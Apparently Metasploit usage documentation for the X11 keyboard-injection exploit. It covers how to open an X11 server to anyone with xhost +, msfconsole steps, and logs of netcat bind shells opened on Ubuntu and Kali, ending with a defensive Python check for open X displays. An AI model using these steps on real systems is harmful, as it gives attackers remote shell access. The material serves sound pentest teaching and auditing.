## Vulnerable Application

X11 (X Window System) is a graphical windowing system most common on unix/linux. When misconfigured, the service accepts connections from any user; this is done with the command `xhost +`.

This exploit has been verified against:

1. Ubuntu 14.04
2. Ubuntu 16.04
3. Kali via Emulation method

This exploit does NOT work against:

1. Solaris 10 Java Desktop System (alt+F2 has no effect)

### Emulation

This can be emulated (on kali) utilizing the following command:

`socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`

### Ubuntu 12.04, 14.04

1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:

    ```
    xserver-allow-tcp=true
    allow-guest=true
    ```

3. Logout or reboot
4. Verification: `sudo netstat -antp | grep 6000`

    ```
    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
    ```

5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`

### Ubuntu 16.04

Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`

## Verification Steps

1. Install and configure X11
2. Start msfconsole
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
4. Do: `set rhost [IPs]`
5. Do: `set payload [payload]`
6. Do: `exploit`

## Scenarios

### Ubuntu 14.04

```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
```

### Ubuntu 16.04

```
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
rhost => 192.168.2.26
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > exploit

[*] Started bind handler
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
UBUNTU_CODENAME=xenial
```

### Kali via Emulation

```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(x11_keyboard_exec) > run

[*] Started bind handler
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
```
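As an added audit check (not part of the module or this write-up), the Python script below performs the X11 connection-setup handshake with no authorization data and classifies the server's reply; an `open` result means the display admits any client, which is the state `xhost +` produces in the setup above. The sample replies, release number and vendor string are constructed for offline testing, and `check_x11_server` is a helper name of my own.

```python
import socket
import struct

def build_setup_request() -> bytes:
    """X11 connection-setup request: little-endian ('l'), protocol 11.0, no auth name/data."""
    return struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)

def parse_setup_reply(data: bytes) -> dict:
    """Classify a setup reply by its first byte: 0 = Failed, 1 = Success, 2 = Authenticate."""
    if len(data) < 8:
        raise ValueError("truncated X11 setup reply")
    status = data[0]
    major, minor = struct.unpack_from("<HH", data, 2)
    if status == 1:
        # Success: release number at offset 8, vendor length at 24, vendor string at 40.
        release = struct.unpack_from("<I", data, 8)[0]
        vendor_len = struct.unpack_from("<H", data, 24)[0]
        vendor = data[40:40 + vendor_len].decode("latin-1")
        return {"open": True, "status": "open", "version": (major, minor),
                "release": release, "vendor": vendor}
    if status == 0:
        # Failed: byte 1 holds the reason length; the reason text follows the 8-byte header.
        reason = data[8:8 + data[1]].decode("latin-1")
        return {"open": False, "status": "refused", "version": (major, minor), "reason": reason}
    return {"open": False, "status": "authenticate", "version": (major, minor)}

def check_x11_server(host: str, port: int = 6000, timeout: float = 3.0) -> dict:
    """Connect to host:port, send the setup request, and classify what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        return parse_setup_reply(sock.recv(4096))

# Constructed sample replies (not captured from a real server) for offline testing.
REFUSED_REPLY = (b"\x00" + bytes([21]) + struct.pack("<HHH", 11, 0, 6)
                 + b"No protocol specified" + b"\x00" * 3)
OPEN_REPLY = (struct.pack("<BxHHH", 1, 11, 0, 13)
              + struct.pack("<IIIIHHBBBBBBBB4x", 11804000, 0x00200000, 0x001FFFFF, 256,
                            20, 65535, 1, 7, 0, 0, 32, 32, 8, 255)
              + b"The X.Org Foundation")

if __name__ == "__main__":
    import sys
    result = check_x11_server(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")
    print("X server is", result["status"], result)
```

Run it against the host you just configured: after `xhost +` it should report `open`, and after `xhost -` it should report `refused`.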